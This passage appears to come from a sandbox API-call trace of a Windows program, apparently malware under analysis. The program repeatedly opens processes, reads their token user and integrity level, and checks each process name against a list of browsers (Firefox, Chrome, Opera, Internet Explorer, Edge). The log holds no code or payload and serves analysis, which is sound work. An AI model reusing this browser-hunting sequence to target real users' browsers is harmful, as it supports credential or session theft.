TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.256] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.256] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.256] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0247.256] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0247.256] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0247.256] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0247.256] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0247.256] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0247.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0247.256] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.256] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.256] GetLastError () returned 0x7a [0247.256] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.256] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.256] CloseHandle (hObject=0x340) returned 1 [0247.256] CloseHandle (hObject=0x548) returned 1 [0247.256] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.256] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.256] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.256] GetLastError () returned 0x7a [0247.256] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.256] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.256] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.257] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0247.257] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0247.257] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0247.257] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0247.257] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0247.257] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0247.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0247.257] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.257] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.257] GetLastError () returned 0x7a [0247.257] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.257] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.257] CloseHandle (hObject=0x340) returned 1 [0247.257] CloseHandle (hObject=0x548) returned 1 [0247.257] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.257] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.257] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.257] GetLastError () returned 0x7a [0247.257] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.257] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.257] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.257] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0247.257] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0247.257] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0247.257] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0247.257] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0247.257] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0247.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0247.257] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.257] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.257] GetLastError () returned 0x7a [0247.257] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.257] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.257] CloseHandle (hObject=0x340) returned 1 [0247.257] CloseHandle (hObject=0x548) returned 1 [0247.258] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.258] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.258] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.258] GetLastError () returned 0x7a [0247.258] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.258] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.258] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.258] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.258] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0247.258] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.258] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.258] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.258] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0247.258] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.258] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.258] GetLastError () returned 0x7a [0247.258] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.258] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.258] CloseHandle (hObject=0x340) returned 1 [0247.258] CloseHandle (hObject=0x548) returned 1 [0247.258] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.258] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.258] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.258] GetLastError () returned 0x7a [0247.258] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.258] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.258] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.258] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0247.258] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0247.258] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0247.258] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0247.258] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0247.258] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0247.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0247.259] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.259] GetLastError () returned 0x7a [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.259] CloseHandle (hObject=0x340) returned 1 [0247.259] CloseHandle (hObject=0x548) returned 1 [0247.259] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.259] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.259] GetLastError () returned 0x7a [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.259] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.259] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.259] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.259] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0247.259] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.259] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.259] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.259] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0247.259] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.259] GetLastError () returned 0x7a [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.259] CloseHandle (hObject=0x340) returned 1 [0247.259] CloseHandle (hObject=0x548) returned 1 [0247.259] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.259] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.259] GetLastError () returned 0x7a [0247.259] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.260] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.260] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.260] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.260] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0247.260] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.260] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.260] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.260] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0247.260] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.260] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.260] GetLastError () returned 0x7a [0247.260] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.260] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.260] CloseHandle (hObject=0x340) returned 1 [0247.260] CloseHandle (hObject=0x548) returned 1 [0247.260] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.260] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.260] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.260] GetLastError () returned 0x7a [0247.260] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.260] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.260] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.260] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.260] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.260] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.260] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.260] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.260] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0247.260] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.260] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.260] GetLastError () returned 0x7a [0247.260] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.260] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.261] CloseHandle (hObject=0x340) returned 1 [0247.261] CloseHandle (hObject=0x548) returned 1 [0247.261] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.261] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.261] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.261] GetLastError () returned 0x7a [0247.261] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.261] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.261] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.261] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0247.261] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0247.261] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0247.261] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0247.261] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0247.261] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0247.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0247.261] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.261] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.261] GetLastError () returned 0x7a [0247.261] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.261] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.261] CloseHandle (hObject=0x340) returned 1 [0247.261] CloseHandle (hObject=0x548) returned 1 [0247.261] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.261] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.261] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, 